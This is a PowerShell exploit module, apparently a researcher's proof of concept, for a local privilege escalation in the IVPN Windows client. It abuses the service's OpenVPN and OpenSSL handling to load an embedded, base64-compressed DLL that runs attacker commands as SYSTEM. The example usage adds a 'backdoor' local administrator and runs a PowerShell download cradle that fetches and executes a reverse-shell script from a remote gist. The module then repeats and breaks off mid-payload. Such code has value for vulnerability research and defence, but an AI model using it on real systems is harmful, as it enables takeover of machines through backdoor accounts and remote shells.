ykoster/Invoke-ExploitIVPNLPE.psd1

## Invoke-ExploitIVPNLPE.psd1
<#
    Example usage:
    Import-Module .\Invoke-ExploitIVPNLPE.psd1
    Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
    Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
    Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
#>
@{
    RootModule = 'Invoke-ExploitIVPNLPE.psm1'
    ModuleVersion = '1.0'
    GUID = '73630188-3482-4d37-a546-b114adcbe223'
    Author = 'Yorick Koster'
    CompanyName = 'Securify B.V.'
    Copyright = '(c) Yorick Koster. All rights reserved.'
    Description = 'IVPN exploit module to run commands with SYSTEM privileges'
    RequiredAssemblies = @("$env:ProgramFiles\IVPN Client\IVPN.Core.dll")
    FunctionsToExport = @("Invoke-ExploitIVPNLPEConfigHijack", "Invoke-ExploitIVPNLPEPkcs11", "Invoke-ExploitIVPNLPEConfigOption")
}

## Invoke-ExploitIVPNLPE.psm1
Enum ExploitMethod
{
    ConfigHijack = 0
    Pkcs11 = 1
    ConfigOption = 2
}

Function Invoke-ExploitIVPNLPEConfigHijack {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
    Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 0
}

Function Invoke-ExploitIVPNLPEPkcs11 {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
    Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 1
}

Function Invoke-ExploitIVPNLPEConfigOption {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
    Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 2
}

Function Invoke-ExploitIVPNLPE {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
    [Parameter(Position = 1, Mandatory = $true)] [ExploitMethod]$ExploitMethod)
    # setup
    New-Item -Type directory -Path $([IVPN.Platform]::SettingsDirectory) | Out-Null
    Copy-Item -Path  "$env:ProgramFiles\IVPN Client\etc\port.txt" -Destination "$([IVPN.Platform]::SettingsDirectory)\port.txt" | Out-Null

    # embedded 32-bit DLL that runs payload.bat
    $EncodedCompressedFile = "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"
    $DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
    $dll = New-Object byte[] 13312
    $DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
    $DeflatedStream.Close() | Out-Null

    # reflection stuff
    $mConnectToService = [IVPN.IVPNClientProxy].GetMethod("ConnectToService", [Reflection.BindingFlags]"NonPublic, Instance")
    $mSendRequest = [IVPN.IVPNClientProxy].GetMethod("SendRequest", [Reflection.BindingFlags]"NonPublic, Instance")
    $fStreamReader = [IVPN.IVPNClientProxy].GetField("__StreamReader", "NonPublic, Instance")
    $fStreamWriter = [IVPN.IVPNClientProxy].GetField("__StreamWriter", "NonPublic, Instance")
    $fVersion = [IVPN.IVPNHelloRequest].GetField("Version", "NonPublic, Instance")
    $fKey = [IVPN.IVPNSetPreferenceRequest].GetField("Key", "NonPublic, Instance")
    $fValue = [IVPN.IVPNSetPreferenceRequest].GetField("Value", "NonPublic, Instance")
    $fEntryVpnServer = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("EntryVpnServer", "NonPublic, Instance")
    $fUsername = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Username", "NonPublic, Instance")
    $fPassword = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Password", "NonPublic, Instance")
    $fPort = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Port", "NonPublic, Instance")
    $fVpnType = [IVPN.IVPNConnectRequest].GetField("VpnType", "NonPublic, Instance")
    $fOpenVpnParameters = [IVPN.IVPNConnectRequest].GetField("OpenVpnParameters", "NonPublic, Instance")
    $fCurrentDns = [IVPN.IVPNConnectRequest].GetField("CurrentDns", "NonPublic, Instance")

    # connect to service
    $client = New-Object IVPN.IVPNClientProxy
    $mConnectToService.Invoke($client, $null)
    $client.ServiceConnected = $true

    # send hello request
    $hello = New-Object IVPN.IVPNHelloRequest
    $fVersion.SetValue($hello, "2.11.2.0")
    $mSendRequest.Invoke($client, $hello)
    Start-Sleep 1

    If($ExploitMethod -eq [ExploitMethod]::ConfigHijack) {
        $targetfolder = "$env:SystemDrive\etc"
        New-Item -Type directory -Path "$targetfolder\ssl" | Out-Null
        Set-Content "$targetfolder\ssl\payload.bat" -Encoding ASCII $Command
        Set-Content "$targetfolder\ssl\lpe.dll" -Encoding Byte $dll
        Set-Content "$targetfolder\ssl\openssl.cnf" -Encoding ASCII "openssl_conf = init
[init]
engines = engines
[engines]
lpe = lpe
[lpe]
engine_id = lpe
dynamic_path = C:\\etc\\ssl\\lpe
default_algorithms = ALL
init = 1"
    } Else {
        $targetfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
        $dllname = [System.Guid]::NewGuid().ToString()
        New-Item -Type directory -Path "$targetfolder" | Out-Null
        Set-Content "$targetfolder\payload.bat" -Encoding ASCII $Command
        Set-Content "$targetfolder\$dllname.dll" -Encoding Byte $dll

        If($ExploitMethod -eq [ExploitMethod]::Pkcs11) {
            $extraparam = "pkcs11-providers $("$targetfolder\$dllname.dll".Replace("\", "\\"))`npkcs11-id $dllname"
        } Else {
            Set-Content "$targetfolder\openvpn.cfg" -Encoding ASCII "engine $("$targetfolder\$dllname".Replace("\", "\\"))"
            $extraparam = "config $("$targetfolder\openvpn.cfg".Replace("\", "\\"))"
        }

        # set OpenVPN extra config parameters
        $setting = New-Object IVPN.IVPNSetPreferenceRequest
        $fKey.SetValue($setting, "open_vpn_extra_parameters")
        $fValue.SetValue($setting, $extraparam)
        $mSendRequest.Invoke($client, $setting)
        Start-Sleep 1
    }

    # launch OpenVPN
    $server = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNVpnServer -Property @{IpAddresses = @("127.0.0.1"); GatewayId = "GatewayId"; CountryCode = "US"; Country = "United States"; City = "New York"}
    $conparams = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters
    $fEntryVpnServer.SetValue($conparams, $server)
    $fUsername.SetValue($conparams, "Username")
    $fPassword.SetValue($conparams, "Password")
    $fPort.SetValue($conparams, $(New-Object IVPN.VpnProtocols.DestinationPort(1337, 1)))
    $conreq = New-Object IVPN.IVPNConnectRequest
    $fVpnType.SetValue($conreq, [IVPN.VpnProtocols.VpnType]::OpenVPN)
    $fOpenVpnParameters.SetValue($conreq, $conparams)
    $fCurrentDns.SetValue($conreq, "8.8.8.8")
    $mSendRequest.Invoke($client, $conreq)
    Start-Sleep 3

    # disconnect vpn
    $mSendRequest.Invoke($client, $(New-Object IVPN.IVPNDisconnectRequest))
    Start-Sleep 1

    # disconnect from service
    $fStreamReader.GetValue($client).Close()
    $fStreamWriter.GetValue($client).Close()
    $client = $null
    # clean up
    Remove-Item $([IVPN.Platform]::SettingsDirectory) -Force -Recurse
    Remove-Item $targetfolder -Force -Recurse
}
	<#
	Example usage:
	Import-Module .\Invoke-ExploitIVPNLPE.psd1
	Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
	Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
	Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
	#>
	@{
	RootModule = 'Invoke-ExploitIVPNLPE.psm1'
	ModuleVersion = '1.0'
	GUID = '73630188-3482-4d37-a546-b114adcbe223'
	Author = 'Yorick Koster'
	CompanyName = 'Securify B.V.'
	Copyright = '(c) Yorick Koster. All rights reserved.'
	Description = 'IVPN exploit module to run commands with SYSTEM privileges'
	RequiredAssemblies = @("$env:ProgramFiles\IVPN Client\IVPN.Core.dll")
	FunctionsToExport = @("Invoke-ExploitIVPNLPEConfigHijack", "Invoke-ExploitIVPNLPEPkcs11", "Invoke-ExploitIVPNLPEConfigOption")
	}
	Enum ExploitMethod
	{
	ConfigHijack = 0
	Pkcs11 = 1
	ConfigOption = 2
	}

	Function Invoke-ExploitIVPNLPEConfigHijack {
	Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
	Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 0
	}

	Function Invoke-ExploitIVPNLPEPkcs11 {
	Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
	Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 1
	}

	Function Invoke-ExploitIVPNLPEConfigOption {
	Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
	Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 2
	}

	Function Invoke-ExploitIVPNLPE {
	Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
	[Parameter(Position = 1, Mandatory = $true)] [ExploitMethod]$ExploitMethod)
	# setup
	New-Item -Type directory -Path $([IVPN.Platform]::SettingsDirectory) \| Out-Null
	Copy-Item -Path "$env:ProgramFiles\IVPN Client\etc\port.txt" -Destination "$([IVPN.Platform]::SettingsDirectory)\port.txt" \| Out-Null

	# embedded 32-bit DLL that runs payload.bat
	$EncodedCompressedFile = "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